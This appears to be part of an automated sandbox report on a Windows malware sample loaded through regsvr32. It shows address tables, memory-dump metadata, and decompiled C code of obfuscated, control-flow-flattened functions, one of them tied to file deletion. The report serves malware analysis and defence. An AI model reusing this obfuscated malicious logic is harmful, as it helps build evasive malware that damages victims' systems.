                                                                                                                0x001b45ae
                                                                                                                0x001b45c0
                                                                                                                0x001b45c3
                                                                                                                0x001b45ca
                                                                                                                0x001b45d5
                                                                                                                0x001b45e2
                                                                                                                0x001b45e6
                                                                                                                0x001b45ee
                                                                                                                0x001b45f6
                                                                                                                0x001b45fe
                                                                                                                0x001b4606
                                                                                                                0x001b460b
                                                                                                                0x001b4610
                                                                                                                0x001b4618
                                                                                                                0x001b4623
                                                                                                                0x001b462e
                                                                                                                0x001b4639
                                                                                                                0x001b4644
                                                                                                                0x001b464c
                                                                                                                0x001b4657
                                                                                                                0x001b465f
                                                                                                                0x001b4667
                                                                                                                0x001b466c
                                                                                                                0x001b4674
                                                                                                                0x001b467c
                                                                                                                0x001b4681
                                                                                                                0x001b4686
                                                                                                                0x001b468e
                                                                                                                0x001b468e
                                                                                                                0x001b4694
                                                                                                                0x001b4694
                                                                                                                0x001b4699
                                                                                                                0x001b4699
                                                                                                                0x001b469f
                                                                                                                0x001b4852
                                                                                                                0x001b4857
                                                                                                                0x001b485a
                                                                                                                0x001b485f
                                                                                                                0x001b485f
                                                                                                                0x001b4865
                                                                                                                0x00000000
                                                                                                                0x001b4865
                                                                                                                0x001b46a7
                                                                                                                0x001b47f1
                                                                                                                0x001b47f6
                                                                                                                0x001b47f9
                                                                                                                0x001b480b
                                                                                                                0x001b4816
                                                                                                                0x001b481b
                                                                                                                0x001b481e
                                                                                                                0x001b4822
                                                                                                                0x001b4831
                                                                                                                0x001b4824
                                                                                                                0x001b4826
                                                                                                                0x001b482b
                                                                                                                0x001b482b
                                                                                                                0x00000000
                                                                                                                0x001b4822
                                                                                                                0x001b46b3
                                                                                                                0x001b4771
                                                                                                                0x001b4775
                                                                                                                0x001b477a
                                                                                                                0x001b4797
                                                                                                                0x001b47b6
                                                                                                                0x001b47c8
                                                                                                                0x001b47d3
                                                                                                                0x001b47d5
                                                                                                                0x001b47e3
                                                                                                                0x001b47e8
                                                                                                                0x00000000
                                                                                                                0x001b47e8
                                                                                                                0x001b46bf
                                                                                                                0x001b4711
                                                                                                                0x001b4715
                                                                                                                0x001b471a
                                                                                                                0x001b4722
                                                                                                                0x001b473f
                                                                                                                0x001b4744
                                                                                                                0x001b4748
                                                                                                                0x001b474d
                                                                                                                0x001b4753
                                                                                                                0x001b4756
                                                                                                                0x001b475b
                                                                                                                0x001b475e
                                                                                                                0x001b4760
                                                                                                                0x001b4763
                                                                                                                0x001b4766
                                                                                                                0x001b4769
                                                                                                                0x001b4694
                                                                                                                0x00000000
                                                                                                                0x001b4694
                                                                                                                0x001b46c3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b46c9
                                                                                                                0x001b46da
                                                                                                                0x001b46ed
                                                                                                                0x001b46f7
                                                                                                                0x001b4700
                                                                                                                0x001b486a
                                                                                                                0x001b486a
                                                                                                                0x001b486a
                                                                                                                0x00000000
                                                                                                                0x001b4876
                                                                                                                0x001b4694

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &,d6$&5x$;>$E
                                                                                                                • API String ID: 0-3806806301
                                                                                                                • Opcode ID: a42b0dc3641da82b84a91461792c61a879e2fc099c657bd2bdbfd80d89ebd9ef
                                                                                                                • Instruction ID: c98ce904117e60ee66694e4fb9e3b331114cb5af038c5f2ba440c0a3d54c5bde
                                                                                                                • Opcode Fuzzy Hash: a42b0dc3641da82b84a91461792c61a879e2fc099c657bd2bdbfd80d89ebd9ef
                                                                                                                • Instruction Fuzzy Hash: 21020FB25093809FD3A8CF65C58AA4BFBE1FBC5718F508A1DF19986260D7B18949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A82D2 Relevance: 3.9, Strings: 3, Instructions: 184COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 679 1a82d2-1a8553 680 1a855b-1a855d 679->680 681 1a855f-1a8565 680->681 682 1a85d2-1a8635 call 1bf5d9 call 1b8eb3 call 1bf94b 680->682 684 1a856b-1a856d 681->684 685 1a8648-1a8658 call 1a8fe9 681->685 697 1a863a-1a8640 682->697 687 1a856f-1a8575 684->687 688 1a85b1-1a85d0 call 1c0575 684->688 694 1a865d-1a865e 685->694 692 1a85ad-1a85af 687->692 693 1a8577-1a857d 687->693 688->680 692->680 693->697 698 1a8583-1a8597 call 1a4b40 693->698 699 1a865f-1a866b 694->699 697->680 701 1a8646 697->701 704 1a859c-1a85ab 698->704 701->699 704->680
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001A82D2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				void* _t184;
				intOrPtr _t186;
				void* _t196;
				void* _t219;
				signed int _t220;
				signed int _t221;
				signed int* _t224;

				_t224 =  &_v1120;
				_v1056 = 0xa8f91e;
				_v1056 = _v1056 + 0xffff39ba;
				_t196 = 0x9dd1674;
				_v1056 = _v1056 ^ 0x00a16c3b;
				_v1100 = 0xe0948e;
				_v1100 = _v1100 ^ 0x18edfd50;
				_v1100 = _v1100 >> 4;
				_v1100 = _v1100 >> 2;
				_v1100 = _v1100 ^ 0x0064ab7c;
				_v1064 = 0x301903;
				_v1064 = _v1064 << 6;
				_v1064 = _v1064 ^ 0x0c0c0596;
				_v1072 = 0x29508e;
				_v1072 = _v1072 ^ 0x1cc21636;
				_v1072 = _v1072 * 0x43;
				_t219 = 0;
				_v1072 = _v1072 ^ 0x919bedb4;
				_v1044 = 0xea4c7f;
				_v1044 = _v1044 << 0xc;
				_v1044 = _v1044 ^ 0xa4cb97a2;
				_v1120 = 0x37421e;
				_t220 = 0x6b;
				_v1120 = _v1120 / _t220;
				_v1120 = _v1120 ^ 0xd80d84f5;
				_t221 = 0x7f;
				_v1120 = _v1120 * 0x28;
				_v1120 = _v1120 ^ 0xc20f1c8f;
				_v1108 = 0xfc8edc;
				_v1108 = _v1108 + 0xffffd2a1;
				_v1108 = _v1108 >> 3;
				_v1108 = _v1108 << 6;
				_v1108 = _v1108 ^ 0x07e32526;
				_v1060 = 0x5750b;
				_v1060 = _v1060 >> 2;
				_v1060 = _v1060 ^ 0x0005da91;
				_v1112 = 0xf2ea77;
				_v1112 = _v1112 + 0xffff512d;
				_v1112 = _v1112 << 6;
				_v1112 = _v1112 | 0xcd991649;
				_v1112 = _v1112 ^ 0xfd9c26f2;
				_v1048 = 0x7191b2;
				_v1048 = _v1048 ^ 0x9ee77789;
				_v1048 = _v1048 ^ 0x9e9352cd;
				_v1080 = 0xf20b24;
				_v1080 = _v1080 | 0xffdefffb;
				_v1080 = _v1080 ^ 0xfff5cd3a;
				_v1076 = 0xc6dae7;
				_v1076 = _v1076 ^ 0xf7c79165;
				_v1076 = _v1076 + 0x291;
				_v1076 = _v1076 ^ 0xf704a098;
				_v1084 = 0x9dd956;
				_v1084 = _v1084 / _t221;
				_v1084 = _v1084 | 0xa6924978;
				_v1084 = _v1084 ^ 0xa69c7e35;
				_v1092 = 0xf4dbbc;
				_v1092 = _v1092 + 0xfd99;
				_v1092 = _v1092 * 0x26;
				_v1092 = _v1092 ^ 0x247b4c14;
				_v1104 = 0x8f829a;
				_v1104 = _v1104 + 0x89ca;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 | 0x9fe15c92;
				_v1104 = _v1104 ^ 0xdff17ae9;
				_v1088 = 0x6b376e;
				_v1088 = _v1088 | 0xe6fa501d;
				_v1088 = _v1088 * 0x16;
				_v1088 = _v1088 ^ 0xd996acc8;
				_v1116 = 0x885564;
				_v1116 = _v1116 | 0x1291e10c;
				_v1116 = _v1116 >> 3;
				_v1116 = _v1116 ^ 0x3b656eb2;
				_v1116 = _v1116 ^ 0x3934836e;
				_v1052 = 0xef3bbb;
				_v1052 = _v1052 + 0xffffe328;
				_v1052 = _v1052 ^ 0x00e709ef;
				_v1096 = 0x28e829;
				_v1096 = _v1096 ^ 0x2214fa8f;
				_v1096 = _v1096 >> 0xa;
				_v1096 = _v1096 + 0xffffb7ce;
				_v1096 = _v1096 ^ 0x000b7e42;
				_v1068 = 0x21ec5d;
				_v1068 = _v1068 + 0x8f15;
				_v1068 = _v1068 >> 8;
				_v1068 = _v1068 ^ 0x000079a0;
				do {
					while(_t196 != 0x1c7aae4) {
						if(_t196 == 0x72e7ca4) {
							E001A8FE9(_v1052,  &_v1040, _v1096, _v1068); // executed
						} else {
							if(_t196 == 0x976a7b6) {
								E001C0575(_v1056, _v1100, __eflags, _t196,  &_v520, _v1064);
								_t224 =  &(_t224[3]);
								_t196 = 0x1c7aae4;
								continue;
							} else {
								if(_t196 == 0x9dd1674) {
									_t196 = 0x976a7b6;
									continue;
								} else {
									_t231 = _t196 - 0xcc2bfe3;
									if(_t196 != 0xcc2bfe3) {
										goto L10;
									} else {
										E001A4B40( &_v1040, _v1088, _t231,  &_v520, _v1116); // executed
										_t219 =  !=  ? 1 : _t219;
										_t196 = 0x72e7ca4;
										continue;
									}
								}
							}
						}
						L13:
						return _t219;
					}
					_push(_v1108);
					_push(0x1a109c);
					_push(_v1120);
					_t184 = E001BF5D9(_v1072, _v1044, __eflags);
					_t186 =  *0x1c4c10; // 0x67d820
					_t166 = _t186 + 4; // 0x67d824
					E001B8EB3(_t166, __eflags, _v1060, _v1072, _v1112,  &_v1040, _v1048, _t184, _v1080);
					E001BF94B(_t184, _v1076, _v1084, _v1092, _v1104);
					_t224 =  &(_t224[0xd]);
					_t196 = 0xcc2bfe3;
					L10:
					__eflags = _t196 - 0x62c7c59;
				} while (__eflags != 0);
				goto L13;
			}
































                                                                                                                0x001a82d2
                                                                                                                0x001a82d8
                                                                                                                0x001a82e2
                                                                                                                0x001a82ea
                                                                                                                0x001a82ef
                                                                                                                0x001a82f7
                                                                                                                0x001a82ff
                                                                                                                0x001a8307
                                                                                                                0x001a830c
                                                                                                                0x001a8311
                                                                                                                0x001a8319
                                                                                                                0x001a8321
                                                                                                                0x001a8326
                                                                                                                0x001a832e
                                                                                                                0x001a8336
                                                                                                                0x001a8347
                                                                                                                0x001a834b
                                                                                                                0x001a834d
                                                                                                                0x001a8355
                                                                                                                0x001a835d
                                                                                                                0x001a8362
                                                                                                                0x001a836a
                                                                                                                0x001a8378
                                                                                                                0x001a837d
                                                                                                                0x001a8383
                                                                                                                0x001a8390
                                                                                                                0x001a8391
                                                                                                                0x001a8395
                                                                                                                0x001a839d
                                                                                                                0x001a83a5
                                                                                                                0x001a83ad
                                                                                                                0x001a83b2
                                                                                                                0x001a83b7
                                                                                                                0x001a83bf
                                                                                                                0x001a83c7
                                                                                                                0x001a83cc
                                                                                                                0x001a83d4
                                                                                                                0x001a83dc
                                                                                                                0x001a83e4
                                                                                                                0x001a83e9
                                                                                                                0x001a83f1
                                                                                                                0x001a83f9
                                                                                                                0x001a8401
                                                                                                                0x001a8409
                                                                                                                0x001a8411
                                                                                                                0x001a8419
                                                                                                                0x001a8421
                                                                                                                0x001a8429
                                                                                                                0x001a8431
                                                                                                                0x001a8439
                                                                                                                0x001a8441
                                                                                                                0x001a8449
                                                                                                                0x001a8457
                                                                                                                0x001a845b
                                                                                                                0x001a8463
                                                                                                                0x001a846b
                                                                                                                0x001a8473
                                                                                                                0x001a8480
                                                                                                                0x001a8484
                                                                                                                0x001a848c
                                                                                                                0x001a8494
                                                                                                                0x001a849c
                                                                                                                0x001a84a1
                                                                                                                0x001a84a9
                                                                                                                0x001a84b1
                                                                                                                0x001a84b9
                                                                                                                0x001a84c6
                                                                                                                0x001a84cf
                                                                                                                0x001a84dc
                                                                                                                0x001a84e4
                                                                                                                0x001a84ec
                                                                                                                0x001a84f1
                                                                                                                0x001a84f9
                                                                                                                0x001a8501
                                                                                                                0x001a8509
                                                                                                                0x001a8511
                                                                                                                0x001a8519
                                                                                                                0x001a8521
                                                                                                                0x001a8529
                                                                                                                0x001a852e
                                                                                                                0x001a8536
                                                                                                                0x001a853e
                                                                                                                0x001a8546
                                                                                                                0x001a854e
                                                                                                                0x001a8553
                                                                                                                0x001a855b
                                                                                                                0x001a855b
                                                                                                                0x001a8565
                                                                                                                0x001a8658
                                                                                                                0x001a856b
                                                                                                                0x001a856d
                                                                                                                0x001a85c6
                                                                                                                0x001a85cb
                                                                                                                0x001a85ce
                                                                                                                0x00000000
                                                                                                                0x001a856f
                                                                                                                0x001a8575
                                                                                                                0x001a85ad
                                                                                                                0x00000000
                                                                                                                0x001a8577
                                                                                                                0x001a8577
                                                                                                                0x001a857d
                                                                                                                0x00000000
                                                                                                                0x001a8583
                                                                                                                0x001a8597
                                                                                                                0x001a85a3
                                                                                                                0x001a85a6
                                                                                                                0x00000000
                                                                                                                0x001a85a6
                                                                                                                0x001a857d
                                                                                                                0x001a8575
                                                                                                                0x001a856d
                                                                                                                0x001a865f
                                                                                                                0x001a866b
                                                                                                                0x001a866b
                                                                                                                0x001a85d2
                                                                                                                0x001a85d6
                                                                                                                0x001a85db
                                                                                                                0x001a85e7
                                                                                                                0x001a8608
                                                                                                                0x001a860d
                                                                                                                0x001a8616
                                                                                                                0x001a862d
                                                                                                                0x001a8632
                                                                                                                0x001a8635
                                                                                                                0x001a863a
                                                                                                                0x001a863a
                                                                                                                0x001a863a
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )($]!$n7k
                                                                                                                • API String ID: 0-315496457
                                                                                                                • Opcode ID: 1ccc2cb413bfeafb619088d524111a6a7e19d26c6dd30cd7ebaaf878e1990343
                                                                                                                • Instruction ID: 09690b7365573ec8e0358af246186cc5b9bfd0383421d7acbb0b6d6d6b5a6498
                                                                                                                • Opcode Fuzzy Hash: 1ccc2cb413bfeafb619088d524111a6a7e19d26c6dd30cd7ebaaf878e1990343
                                                                                                                • Instruction Fuzzy Hash: 35913FB11093429FC398CF24D98A81FBBE1FBD4758F504A1DF58696220D7B18A49CF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A8FE9 Relevance: 3.9, Strings: 3, Instructions: 130COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001A8FE9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v588;
				void* _t136;
				void* _t156;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t136);
				_v64 = _v64 & 0x00000000;
				_v68 = 0xd92827;
				_v36 = 0x89238e;
				_t158 = 0x47;
				_v36 = _v36 * 0x32;
				_v36 = _v36 ^ 0x1acd6b26;
				_v36 = _v36 ^ 0x000c5763;
				_v16 = 0x4622db;
				_v16 = _v16 << 1;
				_v16 = _v16 + 0xf0c5;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x004e0956;
				_v48 = 0x180335;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x0004f932;
				_v60 = 0x1a1a82;
				_v60 = _v60 / _t158;
				_v60 = _v60 ^ 0x0002b767;
				_v44 = 0x5c92fd;
				_v44 = _v44 << 6;
				_v44 = _v44 ^ 0x17220be2;
				_v8 = 0x385021;
				_v8 = _v8 | 0x873a9563;
				_t159 = 0xd;
				_v8 = _v8 / _t159;
				_v8 = _v8 + 0xffff7175;
				_v8 = _v8 ^ 0x0a6fb94f;
				_v56 = 0x69a1e5;
				_t160 = 0xf;
				_v56 = _v56 * 0x76;
				_v56 = _v56 ^ 0x30b5a8bc;
				_v40 = 0xf5e314;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0xaf177545;
				_v52 = 0x174f56;
				_v52 = _v52 + 0x8d29;
				_v52 = _v52 ^ 0x0014606a;
				_v12 = 0xc09c5f;
				_v12 = _v12 * 0x4b;
				_v12 = _v12 + 0xdf67;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 ^ 0x000668e4;
				_v28 = 0xa32fd;
				_v28 = _v28 << 4;
				_v28 = _v28 / _t160;
				_v28 = _v28 ^ 0x00099f30;
				_v32 = 0xc892d8;
				_v32 = _v32 + 0x9448;
				_t161 = 0x50;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x4f57bfb7;
				_v24 = 0x4ba476;
				_v24 = _v24 / _t161;
				_v24 = _v24 + 0xa8c6;
				_v24 = _v24 ^ 0x000b7a76;
				_v20 = 0x284a68;
				_v20 = _v20 + 0x5280;
				_v20 = _v20 + 0xffff8170;
				_t162 = 0x4d;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000663e0;
				_push(_v60);
				_push(0x1a1060);
				_push(_v48);
				E001C1C9B(_v44, _v20, _v8, __edx, E001BF5D9(_v36, _v16, _v20), _v36, _v56, _v40);
				E001BF94B(_t152, _v52, _v12, _v28, _v32);
				_t156 = E001A7BC6(_v24, _v20,  &_v588); // executed
				return _t156;
			}



























                                                                                                                0x001a8ff4
                                                                                                                0x001a8ff9
                                                                                                                0x001a8ffc
                                                                                                                0x001a8ffd
                                                                                                                0x001a8ffe
                                                                                                                0x001a9003
                                                                                                                0x001a9009
                                                                                                                0x001a9010
                                                                                                                0x001a901d
                                                                                                                0x001a9020
                                                                                                                0x001a9023
                                                                                                                0x001a902a
                                                                                                                0x001a9031
                                                                                                                0x001a9038
                                                                                                                0x001a903b
                                                                                                                0x001a9042
                                                                                                                0x001a9045
                                                                                                                0x001a904c
                                                                                                                0x001a9053
                                                                                                                0x001a9057
                                                                                                                0x001a905e
                                                                                                                0x001a906c
                                                                                                                0x001a906f
                                                                                                                0x001a9076
                                                                                                                0x001a907d
                                                                                                                0x001a9081
                                                                                                                0x001a9088
                                                                                                                0x001a908f
                                                                                                                0x001a9099
                                                                                                                0x001a909e
                                                                                                                0x001a90a3
                                                                                                                0x001a90aa
                                                                                                                0x001a90b1
                                                                                                                0x001a90bc
                                                                                                                0x001a90bf
                                                                                                                0x001a90c2
                                                                                                                0x001a90c9
                                                                                                                0x001a90d0
                                                                                                                0x001a90d4
                                                                                                                0x001a90db
                                                                                                                0x001a90e2
                                                                                                                0x001a90e9
                                                                                                                0x001a90f0
                                                                                                                0x001a90fb
                                                                                                                0x001a90fe
                                                                                                                0x001a9105
                                                                                                                0x001a9109
                                                                                                                0x001a9110
                                                                                                                0x001a9117
                                                                                                                0x001a9122
                                                                                                                0x001a9125
                                                                                                                0x001a912c
                                                                                                                0x001a9133
                                                                                                                0x001a913e
                                                                                                                0x001a913f
                                                                                                                0x001a9142
                                                                                                                0x001a9149
                                                                                                                0x001a9155
                                                                                                                0x001a9158
                                                                                                                0x001a9161
                                                                                                                0x001a9168
                                                                                                                0x001a916f
                                                                                                                0x001a9176
                                                                                                                0x001a9182
                                                                                                                0x001a9185
                                                                                                                0x001a9188
                                                                                                                0x001a918f
                                                                                                                0x001a9192
                                                                                                                0x001a9197
                                                                                                                0x001a91bf
                                                                                                                0x001a91d2
                                                                                                                0x001a91e4
                                                                                                                0x001a91f1

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: !P8$VN$hJ(
                                                                                                                • API String ID: 4033686569-2871701308
                                                                                                                • Opcode ID: 4f98732424392c0c2d40a08f65a489f976b5ac1c226d2be1ed55e77615b59a04
                                                                                                                • Instruction ID: 09fa8d3f1e7d30cc4c409970629495df703218e53dde755919db83391e5b6915
                                                                                                                • Opcode Fuzzy Hash: 4f98732424392c0c2d40a08f65a489f976b5ac1c226d2be1ed55e77615b59a04
                                                                                                                • Instruction Fuzzy Hash: 055112B5D01209EBCF08DFE1D98A9EEFBB2FB44318F208159E415B6260D7B91A45CF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A4B40 Relevance: 2.7, Strings: 2, Instructions: 194COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001A4B40(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* _t216;
				signed int _t250;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t283;

				_push(_a8);
				_t283 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t216);
				_v76 = 0xaf4913;
				_v76 = _v76 | 0x60f784be;
				_v76 = _v76 ^ 0x60ffcdbe;
				_v32 = 0x57379b;
				_v32 = _v32 | 0xaf59af44;
				_v32 = _v32 + 0xffff8ca1;
				_t254 = 0x36;
				_v32 = _v32 * 0xb;
				_v32 = _v32 ^ 0x89184f94;
				_v80 = 0xcfb11;
				_v80 = _v80 + 0xbdcf;
				_v80 = _v80 ^ 0x000db0e0;
				_v28 = 0xfd31b5;
				_v28 = _v28 << 0xe;
				_v28 = _v28 / _t254;
				_v28 = _v28 ^ 0xfe80419d;
				_v28 = _v28 ^ 0xffeaeb6b;
				_v12 = 0x49fee0;
				_v12 = _v12 + 0xc9e1;
				_v12 = _v12 | 0xbdbdcfb5;
				_v12 = _v12 ^ 0xbdf05a1e;
				_v88 = 0x87b4f4;
				_t255 = 0x76;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x1395f76f;
				_v48 = 0x9e334f;
				_v48 = _v48 | 0xc2b0d8fa;
				_v48 = _v48 << 5;
				_v48 = _v48 ^ 0x57d078bc;
				_v72 = 0x850a78;
				_v72 = _v72 + 0xffff66f0;
				_v72 = _v72 ^ 0x00822119;
				_v20 = 0x81aa36;
				_v20 = _v20 << 8;
				_v20 = _v20 * 0x16;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x941c2512;
				_v56 = 0x8dee13;
				_v56 = _v56 + 0xffff9353;
				_v56 = _v56 * 0x77;
				_v56 = _v56 ^ 0x41c94d87;
				_v36 = 0xab9045;
				_v36 = _v36 + 0xffffe85f;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x0006e00e;
				_v64 = 0x715e1c;
				_v64 = _v64 ^ 0xef49fb00;
				_v64 = _v64 / _t255;
				_v64 = _v64 ^ 0x020301c9;
				_v84 = 0xb0c597;
				_v84 = _v84 ^ 0x4e283637;
				_v84 = _v84 ^ 0x4e9e9227;
				_v8 = 0x778c1c;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0x22a3;
				_v8 = _v8 * 0x34;
				_v8 = _v8 ^ 0x00383d2b;
				_v52 = 0xae62ff;
				_v52 = _v52 + 0xe5b4;
				_t256 = 0x68;
				_v52 = _v52 / _t256;
				_v52 = _v52 ^ 0x00077a24;
				_v44 = 0x3255f7;
				_v44 = _v44 + 0xa2a3;
				_v44 = _v44 ^ 0x9121dbdd;
				_v44 = _v44 ^ 0x911f2133;
				_v24 = 0xf6365f;
				_t257 = 0x18;
				_v24 = _v24 * 0x4a;
				_v24 = _v24 + 0xffff6e91;
				_v24 = _v24 | 0x0936ea02;
				_v24 = _v24 ^ 0x4f3fc56e;
				_v16 = 0xd0ae6b;
				_t258 = 0x3a;
				_v16 = _v16 / _t257;
				_v16 = _v16 | 0x3e61c6a3;
				_v16 = _v16 + 0xffff2182;
				_v16 = _v16 ^ 0x3e604d19;
				_v92 = 0xc8a9e6;
				_v92 = _v92 | 0x9bdeaf4e;
				_v92 = _v92 ^ 0x9bd016e5;
				_v60 = 0x57a84f;
				_v60 = _v60 << 0xa;
				_v60 = _v60 + 0x8968;
				_v60 = _v60 ^ 0x5ea1fc3a;
				_v40 = 0x5c3bdd;
				_v40 = _v40 + 0x1772;
				_v40 = _v40 / _t258;
				_v40 = _v40 ^ 0x2a9ddb86;
				_v40 = _v40 ^ 0x2a91f2bc;
				_v68 = 0x8370ee;
				_v68 = _v68 >> 9;
				_v68 = _v68 >> 0xc;
				_v68 = _v68 ^ 0x0006b114;
				E001B25CD(_v28, _v12, 0x1e, _v88,  &_v124);
				E001B25CD(_v48, _v72, 0x208, _v20,  &_v644);
				E001B25CD(_v56, _v36, 0x208, _v64,  &_v1164);
				_t197 =  &_v8; // 0x383d2b
				E001A91F2(_v84,  *_t197, _v52, _a4, _v44,  &_v644);
				E001A91F2(_v24, _v16, _v92, _t283, _v60,  &_v1164);
				_v120 = _v76;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v80 | _v32 | 0x00000410;
				_t250 = E001B7DA0(_v40,  &_v124, _v68); // executed
				asm("sbb eax, eax");
				return  ~_t250 + 1;
			}








































                                                                                                                0x001a4b4b
                                                                                                                0x001a4b4e
                                                                                                                0x001a4b50
                                                                                                                0x001a4b53
                                                                                                                0x001a4b54
                                                                                                                0x001a4b55
                                                                                                                0x001a4b5a
                                                                                                                0x001a4b63
                                                                                                                0x001a4b6a
                                                                                                                0x001a4b71
                                                                                                                0x001a4b78
                                                                                                                0x001a4b7f
                                                                                                                0x001a4b8c
                                                                                                                0x001a4b8f
                                                                                                                0x001a4b92
                                                                                                                0x001a4b99
                                                                                                                0x001a4ba0
                                                                                                                0x001a4ba7
                                                                                                                0x001a4bae
                                                                                                                0x001a4bb5
                                                                                                                0x001a4bc0
                                                                                                                0x001a4bc3
                                                                                                                0x001a4bca
                                                                                                                0x001a4bd1
                                                                                                                0x001a4bd8
                                                                                                                0x001a4bdf
                                                                                                                0x001a4be6
                                                                                                                0x001a4bed
                                                                                                                0x001a4bf8
                                                                                                                0x001a4bf9
                                                                                                                0x001a4bfc
                                                                                                                0x001a4c03
                                                                                                                0x001a4c0a
                                                                                                                0x001a4c11
                                                                                                                0x001a4c15
                                                                                                                0x001a4c1c
                                                                                                                0x001a4c23
                                                                                                                0x001a4c2a
                                                                                                                0x001a4c31
                                                                                                                0x001a4c38
                                                                                                                0x001a4c40
                                                                                                                0x001a4c43
                                                                                                                0x001a4c47
                                                                                                                0x001a4c4e
                                                                                                                0x001a4c55
                                                                                                                0x001a4c60
                                                                                                                0x001a4c63
                                                                                                                0x001a4c6a
                                                                                                                0x001a4c71
                                                                                                                0x001a4c78
                                                                                                                0x001a4c7c
                                                                                                                0x001a4c80
                                                                                                                0x001a4c87
                                                                                                                0x001a4c8e
                                                                                                                0x001a4c9a
                                                                                                                0x001a4c9d
                                                                                                                0x001a4ca4
                                                                                                                0x001a4cab
                                                                                                                0x001a4cb2
                                                                                                                0x001a4cb9
                                                                                                                0x001a4cc0
                                                                                                                0x001a4cc4
                                                                                                                0x001a4ccf
                                                                                                                0x001a4cd2
                                                                                                                0x001a4cd9
                                                                                                                0x001a4ce0
                                                                                                                0x001a4cee
                                                                                                                0x001a4cf3
                                                                                                                0x001a4cf8
                                                                                                                0x001a4cff
                                                                                                                0x001a4d06
                                                                                                                0x001a4d0d
                                                                                                                0x001a4d14
                                                                                                                0x001a4d1b
                                                                                                                0x001a4d26
                                                                                                                0x001a4d29
                                                                                                                0x001a4d2c
